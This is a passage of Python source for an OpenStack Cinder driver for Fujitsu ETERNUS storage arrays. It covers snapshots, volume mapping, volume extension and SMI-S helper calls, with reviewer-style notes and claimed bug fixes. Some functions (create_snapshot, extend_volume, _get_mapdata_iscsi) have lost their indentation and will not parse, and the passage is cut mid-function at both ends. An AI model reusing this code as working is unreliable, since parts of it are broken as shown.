                  'errordesc': errordesc})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    LOG.debug('_delete_volume, volumename: %(volumename)s, '
              'Return code: %(rc)lu, '
              'Error: %(errordesc)s.',
              {'volumename': volumename,
               'rc': rc,
               'errordesc': errordesc})
@lockutils.synchronized('ETERNUS-vol', 'cinder-', True)
def create_snapshot(self, snapshot):
"""Create snapshot using SnapOPC."""
LOG.debug('create_snapshot, '
'snapshot id: %(sid)s, volume id: %(vid)s.',
{'sid': snapshot['id'], 'vid': snapshot['volume_id']})
self.conn = self._get_eternus_connection()
snapshotname = snapshot['name']
volumename = snapshot['volume_name']
vol_id = snapshot['volume_id']
volume = snapshot['volume']
d_volumename = self._create_volume_name(snapshot['id'])
s_volumename = self._create_volume_name(vol_id)
vol_instance = self._find_lun(volume)
repservice = self._find_eternus_service(REPL)
# Check the existence of volume.
if vol_instance is None:
# Volume not found on ETERNUS.
msg = (_('create_snapshot, '
'volumename: %(s_volumename)s, '
'source volume not found on ETERNUS.')
% {'s_volumename': s_volumename})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
if repservice is None:
msg = (_('create_snapshot, '
'volumename: %(volumename)s, '
'Replication Service not found.')
% {'volumename': volumename})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
# Get poolname from driver configuration file.
eternus_pool = self._get_drvcfg('EternusSnapPool')
# Check the existence of pool
pool = self._find_pool(eternus_pool)
if pool is None:
msg = (_('create_snapshot, '
'eternus_pool: %(eternus_pool)s, '
'pool not found.')
% {'eternus_pool': eternus_pool})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('create_snapshot, '
'snapshotname: %(snapshotname)s, '
'source volume name: %(volumename)s, '
'vol_instance.path: %(vol_instance)s, '
'dest_volumename: %(d_volumename)s, '
'pool: %(pool)s, '
'Invoke CreateElementReplica.',
{'snapshotname': snapshotname,
'volumename': volumename,
'vol_instance': vol_instance.path,
'd_volumename': d_volumename,
'pool': pool})
# Invoke method for create snapshot
rc, errordesc, job = self._exec_eternus_service(
'CreateElementReplica',
repservice,
ElementName=d_volumename,
TargetPool=pool,
SyncType=self._pywbem_uint(7, '16'),
SourceElement=vol_instance.path)
if rc != 0:
msg = (_('create_snapshot, '
'snapshotname: %(snapshotname)s, '
'source volume name: %(volumename)s, '
'vol_instance.path: %(vol_instance)s, '
'dest volume name: %(d_volumename)s, '
'pool: %(pool)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s.')
% {'snapshotname': snapshotname,
'volumename': volumename,
'vol_instance': vol_instance.path,
'd_volumename': d_volumename,
'pool': pool,
'rc': rc,
'errordesc': errordesc})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
else:
element = job['TargetElement']
LOG.debug('create_snapshot, '
'volumename:%(volumename)s, '
'Return code:%(rc)lu, '
'Error:%(errordesc)s.',
{'volumename': volumename,
'rc': rc,
'errordesc': errordesc})
# Create return value.
element_path = {
'classname': element.classname,
'keybindings': {
'CreationClassName': element['CreationClassName'],
'SystemName': element['SystemName'],
'DeviceID': element['DeviceID'],
'SystemCreationClassName': element['SystemCreationClassName']
}
}
sdv_no = "0x" + element['DeviceID'][24:28]
metadata = {'FJ_SDV_Name': d_volumename,
'FJ_SDV_No': sdv_no,
'FJ_Pool_Name': eternus_pool}
return (element_path, metadata)
def delete_snapshot(self, snapshot):
    """Delete snapshot."""
    LOG.debug('delete_snapshot, '
              'snapshot id: %(sid)s, volume id: %(vid)s.',
              {'sid': snapshot['id'], 'vid': snapshot['volume_id']})

    # A snapshot is an SDV on the array, so it goes through the same
    # deletion path as a regular volume.
    existed = self.delete_volume(snapshot)
    LOG.debug('delete_snapshot, vol_exist: %s.', existed)
    return existed
def initialize_connection(self, volume, connector):
    """Allow connection to connector and return connection info.

    Maps the volume to the connector's host (unless already mapped) and
    builds the driver_volume_type payload for FC or iSCSI.

    :param volume: cinder volume dict; must exist on the array.
    :param connector: connector dict from the attaching host.
    :returns: device_info dict with 'driver_volume_type' and 'data'.
    :raises VolumeBackendAPIException: if the volume is not found.
    """
    LOG.debug('initialize_connection, '
              'volume id: %(vid)s, protocol: %(prtcl)s.',
              {'vid': volume['id'], 'prtcl': self.protocol})

    self.conn = self._get_eternus_connection()
    vol_instance = self._find_lun(volume)
    # Check the existence of volume
    if vol_instance is None:
        # Volume not found
        msg = (_('initialize_connection, '
                 'volume: %(volume)s, '
                 'Volume not found.')
               % {'volume': volume['name']})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    target_portlist = self._get_target_port()
    mapdata = self._get_mapdata(vol_instance, connector, target_portlist)

    if mapdata:
        # volume is already mapped
        target_lun = mapdata.get('target_lun', None)
        target_luns = mapdata.get('target_luns', None)
        LOG.info('initialize_connection, '
                 'volume: %(volume)s, '
                 'target_lun: %(target_lun)s, '
                 'target_luns: %(target_luns)s, '
                 'Volume is already mapped.',
                 {'volume': volume['name'],
                  'target_lun': target_lun,
                  'target_luns': target_luns})
    else:
        # Map, then re-read the mapping to get the assigned LUN(s).
        self._map_lun(vol_instance, connector, target_portlist)
        mapdata = self._get_mapdata(vol_instance,
                                    connector, target_portlist)

    mapdata['target_discovered'] = True
    mapdata['volume_id'] = volume['id']

    # NOTE(review): device_info is left unbound if self.protocol is
    # neither 'fc' nor 'iSCSI' -- the constructor only sets those two
    # values, but confirm no other protocol string can reach here.
    if self.protocol == 'fc':
        device_info = {'driver_volume_type': 'fibre_channel',
                       'data': mapdata}
    elif self.protocol == 'iSCSI':
        device_info = {'driver_volume_type': 'iscsi',
                       'data': mapdata}

    LOG.debug('initialize_connection, '
              'device_info:%(info)s.',
              {'info': device_info})
    return device_info
def terminate_connection(self, volume, connector, force=False, **kwargs):
    """Disallow connection from connector."""
    LOG.debug('terminate_connection, '
              'volume id: %(vid)s, protocol: %(prtcl)s, force: %(frc)s.',
              {'vid': volume['id'], 'prtcl': self.protocol, 'frc': force})

    self.conn = self._get_eternus_connection()

    # Without a connector we cannot tell which host to unmap from, so
    # force-remove every mapping for this volume.
    if not connector:
        force = True

    map_exist = self._unmap_lun(volume, connector, force)
    LOG.debug('terminate_connection, map_exist: %s.', map_exist)
    return map_exist
def build_fc_init_tgt_map(self, connector, target_wwn=None):
    """Build parameter for Zone Manager"""
    LOG.debug('build_fc_init_tgt_map, target_wwn: %s.', target_wwn)

    if target_wwn is None:
        # No explicit targets: enumerate every FC target port WWN.
        target_wwn = [port['Name'] for port in self._get_target_port()]

    init_tgt_map = {}
    for initiator in self._find_initiator_names(connector):
        init_tgt_map[initiator] = target_wwn

    LOG.debug('build_fc_init_tgt_map, '
              'initiator target mapping: %s.', init_tgt_map)
    return init_tgt_map
def check_attached_volume_in_zone(self, connector):
    """Check Attached Volume in Same FC Zone or not"""
    LOG.debug('check_attached_volume_in_zone, connector: %s.', connector)

    # Any affinity group for this connector means a volume is attached.
    attached = bool(self._find_affinity_group(connector))

    LOG.debug('check_attached_volume_in_zone, attached: %s.', attached)
    return attached
@lockutils.synchronized('ETERNUS-vol', 'cinder-', True)
def extend_volume(self, volume, new_size):
"""Extend volume on ETERNUS."""
LOG.debug('extend_volume, volume id: %(vid)s, '
'size: %(size)s, new_size: %(nsize)s.',
{'vid': volume['id'],
'size': volume['size'], 'nsize': new_size})
self.conn = self._get_eternus_connection()
volumesize = new_size * units.Gi
volumename = self._create_volume_name(volume['id'])
# Get source volume instance.
vol_instance = self._find_lun(volume)
if vol_instance is None:
msg = (_('extend_volume, '
'volumename: %(volumename)s, '
'volume not found.')
% {'volumename': volumename})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('extend_volume, volumename: %(volumename)s, '
'volumesize: %(volumesize)u, '
'volume instance: %(vol_instance)s.',
{'volumename': volumename,
'volumesize': volumesize,
'vol_instance': vol_instance.path})
# Get poolname from driver configuration file.
eternus_pool = self._get_drvcfg('EternusPool')
# Check the existence of volume.
pool = self._find_pool(eternus_pool)
if pool is None:
msg = (_('extend_volume, '
'eternus_pool: %(eternus_pool)s, '
'pool not found.')
% {'eternus_pool': eternus_pool})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
# Set pooltype.
if 'RSP' in pool['InstanceID']:
pooltype = RAIDGROUP
else:
pooltype = TPPOOL
configservice = self._find_eternus_service(STOR_CONF)
if configservice is None:
msg = (_('extend_volume, volume: %(volume)s, '
'volumename: %(volumename)s, '
'eternus_pool: %(eternus_pool)s, '
'Storage Configuration Service not found.')
% {'volume': volume,
'volumename': volumename,
'eternus_pool': eternus_pool})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('extend_volume, '
'CreateOrModifyElementFromStoragePool, '
'ConfigService: %(service)s, '
'ElementName: %(volumename)s, '
'InPool: %(eternus_pool)s, '
'ElementType: %(pooltype)u, '
'Size: %(volumesize)u, '
'TheElement: %(vol_instance)s.',
{'service': configservice,
'volumename': volumename,
'eternus_pool': eternus_pool,
'pooltype': pooltype,
'volumesize': volumesize,
'vol_instance': vol_instance.path})
# Invoke method for extend volume
rc, errordesc, job = self._exec_eternus_service(
'CreateOrModifyElementFromStoragePool',
configservice,
ElementName=volumename,
InPool=pool,
ElementType=self._pywbem_uint(pooltype, '16'),
Size=self._pywbem_uint(volumesize, '64'),
TheElement=vol_instance.path)
if rc != 0:
msg = (_('extend_volume, '
'volumename: %(volumename)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s, '
'PoolType: %(pooltype)s.')
% {'volumename': volumename,
'rc': rc,
'errordesc': errordesc,
'pooltype': POOL_TYPE_dic[pooltype]})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('extend_volume, '
'volumename: %(volumename)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s, '
'Pool Name: %(eternus_pool)s, '
'Pool Type: %(pooltype)s.',
{'volumename': volumename,
'rc': rc,
'errordesc': errordesc,
'eternus_pool': eternus_pool,
'pooltype': POOL_TYPE_dic[pooltype]})
return eternus_pool
@lockutils.synchronized('ETERNUS-update', 'cinder-', True)
def update_volume_stats(self):
    """get pool capacity."""
    self.conn = self._get_eternus_connection()
    eternus_pool = self._get_drvcfg('EternusPool')

    LOG.debug('update_volume_stats, pool name: %s.', eternus_pool)

    pool = self._find_pool(eternus_pool, True)
    if not pool:
        # if pool information is unknown, set 0 GB to capacity information
        LOG.warning('update_volume_stats, '
                    'eternus_pool:%(eternus_pool)s, '
                    'specified pool is not found.',
                    {'eternus_pool': eternus_pool})
        self.stats['total_capacity_gb'] = 0
        self.stats['free_capacity_gb'] = 0
    else:
        self.stats['total_capacity_gb'] = (
            pool['TotalManagedSpace'] / units.Gi)
        self.stats['free_capacity_gb'] = (
            pool['RemainingManagedSpace'] / units.Gi)

    self.stats['multiattach'] = False

    LOG.debug('update_volume_stats, '
              'eternus_pool:%(eternus_pool)s, '
              'total capacity[%(total)s], '
              'free capacity[%(free)s].',
              {'eternus_pool': eternus_pool,
               'total': self.stats['total_capacity_gb'],
               'free': self.stats['free_capacity_gb']})

    return (self.stats, eternus_pool)
def _get_mapdata(self, vol_instance, connector, target_portlist):
    """return mapping information."""
    mapdata = None
    multipath = connector.get('multipath', False)

    LOG.debug('_get_mapdata, volume name: %(vname)s, '
              'protocol: %(prtcl)s, multipath: %(mpath)s.',
              {'vname': vol_instance['ElementName'],
               'prtcl': self.protocol, 'mpath': multipath})

    # find affinity group
    # attach the connector and include the volume
    aglist = self._find_affinity_group(connector, vol_instance)
    if aglist:
        # Mapping exists; build the protocol-specific payload.
        if self.protocol == 'fc':
            mapdata = self._get_mapdata_fc(aglist, vol_instance,
                                           target_portlist)
        elif self.protocol == 'iSCSI':
            mapdata = self._get_mapdata_iscsi(aglist, vol_instance,
                                              multipath)
    else:
        LOG.debug('_get_mapdata, ag_list:%s.', aglist)

    LOG.debug('_get_mapdata, mapdata: %s.', mapdata)
    return mapdata
def _get_mapdata_fc(self, aglist, vol_instance, target_portlist):
    """_get_mapdata for FibreChannel.

    Finds the volume-to-affinity-group mapping shared by the volume and
    the first affinity group, and reads its LUN number.

    :param aglist: affinity groups for the connector (first one is used).
    :param vol_instance: CIM instance of the mapped volume.
    :param target_portlist: FC target port instances; their 'Name' values
        become target WWNs.
    :returns: dict with 'target_wwn' (list) and 'target_lun' (int).
    :raises VolumeBackendAPIException: on CIM communication failure.
    """
    target_wwn = []

    try:
        ag_volmaplist = self._reference_eternus_names(
            aglist[0],
            ResultClass='CIM_ProtocolControllerForUnit')
        vo_volmaplist = self._reference_eternus_names(
            vol_instance.path,
            ResultClass='CIM_ProtocolControllerForUnit')
    except pywbem.CIM_Error:
        msg = (_('_get_mapdata_fc, '
                 'getting host-affinity from aglist/vol_instance failed, '
                 'affinitygroup: %(ag)s, '
                 'ReferenceNames, '
                 'cannot connect to ETERNUS.')
               % {'ag': aglist[0]})
        LOG.exception(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    # Pick the mapping entry common to both the volume and the group.
    volmap = None
    for vo_volmap in vo_volmaplist:
        if vo_volmap in ag_volmaplist:
            volmap = vo_volmap
            break

    # NOTE(review): if no common mapping exists, volmap stays None and
    # the GetInstance below is issued with None -- confirm callers only
    # invoke this when the volume is mapped to aglist[0].
    try:
        volmapinstance = self._get_eternus_instance(
            volmap,
            LocalOnly=False)
    except pywbem.CIM_Error:
        msg = (_('_get_mapdata_fc, '
                 'getting host-affinity instance failed, '
                 'volmap: %(volmap)s, '
                 'GetInstance, '
                 'cannot connect to ETERNUS.')
               % {'volmap': volmap})
        LOG.exception(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    # DeviceNumber is a hex string on the array.
    target_lun = int(volmapinstance['DeviceNumber'], 16)

    for target_port in target_portlist:
        target_wwn.append(target_port['Name'])

    mapdata = {'target_wwn': target_wwn,
               'target_lun': target_lun}
    LOG.debug('_get_mapdata_fc, mapdata: %s.', mapdata)
    return mapdata
def _get_mapdata_iscsi(self, aglist, vol_instance, multipath):
"""_get_mapdata for iSCSI."""
target_portals = []
target_iqns = []
target_luns = []
try:
vo_volmaplist = self._reference_eternus_names(
vol_instance.path,
ResultClass='CIM_ProtocolControllerForUnit')
except Exception:
msg = (_('_get_mapdata_iscsi, '
'vol_instance: %(vol_instance)s, '
'ReferenceNames: CIM_ProtocolControllerForUnit, '
'cannot connect to ETERNUS.')
% {'vol_instance': vol_instance})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
target_properties_list = self._get_eternus_iscsi_properties()
target_list = [prop[0] for prop in target_properties_list]
properties_list = (
[(prop[1], prop[2]) for prop in target_properties_list])
for ag in aglist:
try:
iscsi_endpointlist = (
self._assoc_eternus_names(
ag,
AssocClass='FUJITSU_SAPAvailableForElement',
ResultClass='FUJITSU_iSCSIProtocolEndpoint'))
except Exception:
msg = (_('_get_mapdata_iscsi, '
'Associators: FUJITSU_SAPAvailableForElement, '
'cannot connect to ETERNUS.'))
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
iscsi_endpoint = iscsi_endpointlist[0]
if iscsi_endpoint not in target_list:
continue
idx = target_list.index(iscsi_endpoint)
target_portal, target_iqn = properties_list[idx]
try:
ag_volmaplist = self._reference_eternus_names(
ag,
ResultClass='CIM_ProtocolControllerForUnit')
except Exception:
msg = (_('_get_mapdata_iscsi, '
'affinitygroup: %(ag)s, '
'ReferenceNames, '
'cannot connect to ETERNUS.')
% {'ag': ag})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
volmap = None
for vo_volmap in vo_volmaplist:
if vo_volmap in ag_volmaplist:
volmap = vo_volmap
break
if volmap is None:
continue
try:
volmapinstance = self._get_eternus_instance(
volmap,
LocalOnly=False)
except Exception:
msg = (_('_get_mapdata_iscsi, '
'volmap: %(volmap)s, '
'GetInstance, '
'cannot connect to ETERNUS.')
% {'volmap': volmap})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
target_lun = int(volmapinstance['DeviceNumber'], 16)
target_portals.append(target_portal)
target_iqns.append(target_iqn)
target_luns.append(target_lun)
if multipath:
mapdata = {'target_portals': target_portals,
'target_iqns': target_iqns,
'target_luns': target_luns}
else:
mapdata = {'target_portal': target_portals[0],
'target_iqn': target_iqns[0],
'target_lun': target_luns[0]}
LOG.debug('_get_mapdata_iscsi, mapdata: %s.', mapdata)
return mapdata
def _get_drvcfg(self, tagname, filename=None, multiple=False):
    """Read a value (or all values) for *tagname* from the driver config XML.

    Returns the text of the first matching element, or a de-duplicated
    list of element texts when ``multiple`` is True.  Raises
    VolumeBackendAPIException when nothing usable is found.
    """
    if filename is None:
        # Fall back to the configured driver configuration file.
        filename = self.configuration.cinder_eternus_config_file

    LOG.debug("_get_drvcfg, input[%(filename)s][%(tagname)s].",
              {'filename': filename, 'tagname': tagname})

    root = ET.parse(filename).getroot()
    if multiple:
        ret = []
        for node in root.findall(".//" + tagname):
            if node.text is not None and node.text not in ret:
                ret.append(node.text)
    else:
        ret = root.findtext(".//" + tagname)

    if not ret:
        msg = (_('_get_drvcfg, '
                 'filename: %(filename)s, '
                 'tagname: %(tagname)s, '
                 'data is None!! '
                 'Please edit driver configuration file and correct.')
               % {'filename': filename,
                  'tagname': tagname})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
    return ret
def _get_eternus_connection(self, filename=None):
    """return WBEM connection.

    Reads the array's IP, port, user and password from the driver
    configuration file and opens a pywbem WBEMConnection against the
    SMI-S provider in the 'root/eternus' namespace.
    """
    LOG.debug('_get_eternus_connection, filename: %s.', filename)
    ip = self._get_drvcfg('EternusIP', filename)
    port = self._get_drvcfg('EternusPort', filename)
    user = self._get_drvcfg('EternusUser', filename)
    passwd = self._get_drvcfg('EternusPassword', filename)
    url = 'http://' + ip + ':' + port
    conn = pywbem.WBEMConnection(url, (user, passwd),
                                 default_namespace='root/eternus')
    # NOTE(review): WBEMConnection() is a constructor and is not expected
    # to return None, so this guard looks unreachable -- confirm before
    # relying on it for error reporting.
    if conn is None:
        msg = (_('_get_eternus_connection, '
                 'filename: %(filename)s, '
                 'ip: %(ip)s, '
                 'port: %(port)s, '
                 'user: %(user)s, '
                 'passwd: ****, '
                 'url: %(url)s, '
                 'FAILED!!.')
               % {'filename': filename,
                  'ip': ip,
                  'port': port,
                  'user': user,
                  'url': url})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
    LOG.debug('_get_eternus_connection, conn: %s.', conn)
    return conn
def _create_volume_name(self, id_code):
    """Derive the ETERNUS volume name from an OpenStack volume id.

    The name is VOL_PREFIX plus the urlsafe-base64 of the MD5 digest
    of the id, which keeps it within the array's name-length limit.
    """
    LOG.debug('_create_volume_name, id_code: %s.', id_code)

    if id_code is None:
        msg = _('_create_volume_name, id_code is None.')
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    digest = hashlib.md5(id_code.encode('utf-8')).digest()
    # pylint: disable=E1121
    encoded = base64.urlsafe_b64encode(digest).decode()
    ret = VOL_PREFIX + six.text_type(encoded)
    LOG.debug('_create_volume_name, ret: %s', ret)
    return ret
def _find_pool(self, eternus_pool, detail=False):
    """Look up a storage pool by name on the ETERNUS array.

    Returns the pool CIM instance when ``detail`` is True, otherwise
    its instance path; None when no pool with that name exists.
    """
    LOG.debug('_find_pool, pool name: %s.', eternus_pool)

    # Get pools info form CIM instance(include info about instance path).
    try:
        tppoollist = self._enum_eternus_instances(
            'FUJITSU_ThinProvisioningPool')
        rgpoollist = self._enum_eternus_instances(
            'FUJITSU_RAIDStoragePool')
    except Exception:
        msg = (_('_find_pool, '
                 'eternus_pool:%(eternus_pool)s, '
                 'EnumerateInstances, '
                 'cannot connect to ETERNUS.')
               % {'eternus_pool': eternus_pool})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    # One eternus backend has only one special pool name
    # so just use pool name can get the target pool.
    poolinstance = next(
        (pool for pool in tppoollist + rgpoollist
         if pool['ElementName'] == eternus_pool),
        None)

    if poolinstance is None:
        ret = None
    elif detail:
        ret = poolinstance
    else:
        ret = poolinstance.path

    LOG.debug('_find_pool, pool: %s.', ret)
    return ret
def _find_eternus_service(self, classname):
    """find CIM instance about service information.

    Returns the first instance name of *classname*, or None when the
    enumeration is empty.  Callers (e.g. _map_lun, _delete_copysession)
    test the return value against None, but the previous implementation
    indexed ``services[0]`` unconditionally and raised IndexError when
    the service class had no instances -- return None in that case.
    """
    LOG.debug('_find_eternus_service, '
              'classname: %s.', classname)
    try:
        services = self._enum_eternus_instance_names(
            six.text_type(classname))
    except Exception:
        msg = (_('_find_eternus_service, '
                 'classname: %(classname)s, '
                 'EnumerateInstanceNames, '
                 'cannot connect to ETERNUS.')
               % {'classname': classname})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
    # None (not IndexError) when the service is absent, so the callers'
    # "is None" checks actually trigger.
    ret = services[0] if services else None
    LOG.debug('_find_eternus_service, '
              'classname: %(classname)s, '
              'ret: %(ret)s.',
              {'classname': classname, 'ret': ret})
    return ret
@lockutils.synchronized('ETERNUS-SMIS-exec', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _exec_eternus_service(self, classname, instanceNameList, **param_dict):
    """Execute SMI-S Method.

    Invokes the CIM method *classname* on *instanceNameList* with
    *param_dict* as method parameters, waits for any asynchronous job
    to complete, and returns (return code, error description, data).

    Bug fix: ``rc`` was referenced in the except handler before being
    assigned, so a connection failure raised UnboundLocalError instead
    of the intended VolumeBackendAPIException; initialize it first.
    """
    LOG.debug('_exec_eternus_service, '
              'classname: %(a)s, '
              'instanceNameList: %(b)s, '
              'parameters: %(c)s.',
              {'a': classname,
               'b': instanceNameList,
               'c': param_dict})
    rc = None
    retdata = None
    # Use InvokeMethod.
    try:
        rc, retdata = self.conn.InvokeMethod(
            classname,
            instanceNameList,
            **param_dict)
    except Exception:
        # InvokeMethod failed before assigning rc; report it as a
        # backend connection problem (the retry decorator may retry).
        if rc is None:
            msg = (_('_exec_eternus_service, '
                     'classname: %(classname)s, '
                     'InvokeMethod, '
                     'cannot connect to ETERNUS.')
                   % {'classname': classname})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
    # If the result has job information, wait for job complete
    if "Job" in retdata:
        rc = self._wait_for_job_complete(self.conn, retdata)
    if rc == DEVICE_IS_BUSY:
        msg = _('Device is in Busy state')
        raise exception.VolumeBackendAPIException(data=msg)
    errordesc = RETCODE_dic.get(six.text_type(rc), UNDEF_MSG)
    ret = (rc, errordesc, retdata)
    LOG.debug('_exec_eternus_service, '
              'classname: %(a)s, '
              'instanceNameList: %(b)s, '
              'parameters: %(c)s, '
              'Return code: %(rc)s, '
              'Error: %(errordesc)s, '
              'Return data: %(retdata)s.',
              {'a': classname,
               'b': instanceNameList,
               'c': param_dict,
               'rc': rc,
               'errordesc': errordesc,
               'retdata': retdata})
    return ret
@lockutils.synchronized('ETERNUS-SMIS-other', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _enum_eternus_instances(self, classname):
    """Enumerate Instances.

    Locked/retried thin wrapper around pywbem EnumerateInstances;
    returns the list of CIM instances of *classname*.
    """
    LOG.debug('_enum_eternus_instances, classname: %s.', classname)
    ret = self.conn.EnumerateInstances(classname)
    LOG.debug('_enum_eternus_instances, enum %d instances.', len(ret))
    return ret
@lockutils.synchronized('ETERNUS-SMIS-other', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _enum_eternus_instance_names(self, classname):
    """Enumerate Instance Names.

    Locked/retried thin wrapper around pywbem EnumerateInstanceNames;
    returns the list of CIM instance names (paths) of *classname*.
    """
    LOG.debug('_enum_eternus_instance_names, classname: %s.', classname)
    ret = self.conn.EnumerateInstanceNames(classname)
    LOG.debug('_enum_eternus_instance_names, enum %d names.', len(ret))
    return ret
@lockutils.synchronized('ETERNUS-SMIS-getinstance', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _get_eternus_instance(self, classname, **param_dict):
    """Get Instance.

    Locked/retried thin wrapper around pywbem GetInstance; *classname*
    is a CIM instance name (path), extra keywords (e.g. LocalOnly) are
    passed straight through to pywbem.
    """
    LOG.debug('_get_eternus_instance, '
              'classname: %(cls)s, param: %(param)s.',
              {'cls': classname, 'param': param_dict})
    ret = self.conn.GetInstance(classname, **param_dict)
    LOG.debug('_get_eternus_instance, ret: %s.', ret)
    return ret
@lockutils.synchronized('ETERNUS-SMIS-other', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _assoc_eternus(self, classname, **param_dict):
    """Associator.

    Locked/retried thin wrapper around pywbem Associators; returns the
    CIM instances associated with *classname* (an instance path),
    filtered by keywords such as AssocClass/ResultClass.
    """
    LOG.debug('_assoc_eternus, '
              'classname: %(cls)s, param: %(param)s.',
              {'cls': classname, 'param': param_dict})
    ret = self.conn.Associators(classname, **param_dict)
    LOG.debug('_assoc_eternus, enum %d instances.', len(ret))
    return ret
@lockutils.synchronized('ETERNUS-SMIS-other', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _assoc_eternus_names(self, classname, **param_dict):
    """Associator Names.

    Locked/retried thin wrapper around pywbem AssociatorNames; returns
    the instance names (paths) associated with *classname*.
    """
    LOG.debug('_assoc_eternus_names, '
              'classname: %(cls)s, param: %(param)s.',
              {'cls': classname, 'param': param_dict})
    ret = self.conn.AssociatorNames(classname, **param_dict)
    LOG.debug('_assoc_eternus_names, enum %d names.', len(ret))
    return ret
@lockutils.synchronized('ETERNUS-SMIS-other', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _reference_eternus_names(self, classname, **param_dict):
    """Refference Names.

    Locked/retried thin wrapper around pywbem ReferenceNames; returns
    the association instance names that reference *classname*.
    """
    LOG.debug('_reference_eternus_names, '
              'classname: %(cls)s, param: %(param)s.',
              {'cls': classname, 'param': param_dict})
    ret = self.conn.ReferenceNames(classname, **param_dict)
    LOG.debug('_reference_eternus_names, enum %d names.', len(ret))
    return ret
def _create_eternus_instance_name(self, classname, bindings):
    """Build a pywbem CIMInstanceName in the 'root/eternus' namespace.

    Returns None when pywbem is unavailable (NameError), which callers
    treat as "instance could not be reconstructed".
    """
    LOG.debug('_create_eternus_instance_name, '
              'classname: %(cls)s, bindings: %(bind)s.',
              {'cls': classname, 'bind': bindings})

    params = dict(namespace='root/eternus', keybindings=bindings)
    try:
        instancename = pywbem.CIMInstanceName(classname, **params)
    except NameError:
        instancename = None

    LOG.debug('_create_eternus_instance_name, ret: %s.', instancename)
    return instancename
def _find_lun(self, volume):
    """find lun instance from volume class or volumename on ETERNUS.

    Fast path: rebuild the CIM InstanceName stored in the volume's
    provider_location and fetch the instance directly.  If that fails
    (volumes created by old driver versions, invalid/stale location
    data), fall back to enumerating every FUJITSU_StorageVolume and
    matching on ElementName.  Returns the volume CIM instance or None.
    """
    LOG.debug('_find_lun, volume id: %s.', volume['id'])
    volumeinstance = None
    volumename = self._create_volume_name(volume['id'])
    try:
        location = ast.literal_eval(volume['provider_location'])
        classname = location['classname']
        bindings = location['keybindings']
        if classname and bindings:
            LOG.debug('_find_lun, '
                      'classname: %(classname)s, '
                      'bindings: %(bindings)s.',
                      {'classname': classname,
                       'bindings': bindings})
            volume_instance_name = (
                self._create_eternus_instance_name(classname, bindings))
            LOG.debug('_find_lun, '
                      'volume_insatnce_name: %(volume_instance_name)s.',
                      {'volume_instance_name': volume_instance_name})
            vol_instance = (
                self._get_eternus_instance(volume_instance_name))
            # provider_location can be stale: double-check the name.
            if vol_instance['ElementName'] == volumename:
                volumeinstance = vol_instance
    except Exception:
        # Any failure (missing/unparsable provider_location, CIM error)
        # just triggers the slow enumeration fallback below.
        volumeinstance = None
        LOG.debug('_find_lun, '
                  'Cannot get volume instance from provider location, '
                  'Search all volume using EnumerateInstanceNames.')
    if volumeinstance is None:
        # for old version
        LOG.debug('_find_lun, '
                  'volumename: %(volumename)s.',
                  {'volumename': volumename})
        # get volume instance from volumename on ETERNUS
        try:
            namelist = self._enum_eternus_instance_names(
                'FUJITSU_StorageVolume')
        except Exception:
            msg = (_('_find_lun, '
                     'volumename: %(volumename)s, '
                     'EnumerateInstanceNames, '
                     'cannot connect to ETERNUS.')
                   % {'volumename': volumename})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
        for name in namelist:
            try:
                vol_instance = self._get_eternus_instance(name)
                if vol_instance['ElementName'] == volumename:
                    volumeinstance = vol_instance
                    path = volumeinstance.path
                    LOG.debug('_find_lun, '
                              'volumename: %(volumename)s, '
                              'vol_instance: %(vol_instance)s.',
                              {'volumename': volumename,
                               'vol_instance': path})
                    break
            except Exception:
                # Skip volumes that disappear or fail to fetch mid-scan.
                continue
        else:
            # Loop completed without a break: no such volume on the array.
            LOG.debug('_find_lun, '
                      'volumename: %(volumename)s, '
                      'volume not found on ETERNUS.',
                      {'volumename': volumename})
    LOG.debug('_find_lun, ret: %s.', volumeinstance)
    return volumeinstance
def _find_copysession(self, vol_instance):
    """find copysession from volumename on ETERNUS.

    Returns the (possibly empty) list of FUJITSU_StorageSynchronized
    association names that reference the given volume instance.
    """
    LOG.debug('_find_copysession, volume name: %s.',
              vol_instance['ElementName'])
    try:
        # NOTE(review): this calls self.conn.ReferenceNames directly
        # instead of the locked/retried _reference_eternus_names wrapper
        # used elsewhere in this class -- confirm whether bypassing the
        # lock is intentional.
        cpsessionlist = self.conn.ReferenceNames(
            vol_instance.path,
            ResultClass='FUJITSU_StorageSynchronized')
    except Exception:
        msg = (_('_find_copysession, '
                 'ReferenceNames, '
                 'vol_instance: %(vol_instance_path)s, '
                 'Cannot connect to ETERNUS.')
               % {'vol_instance_path': vol_instance.path})
        LOG.error(msg)
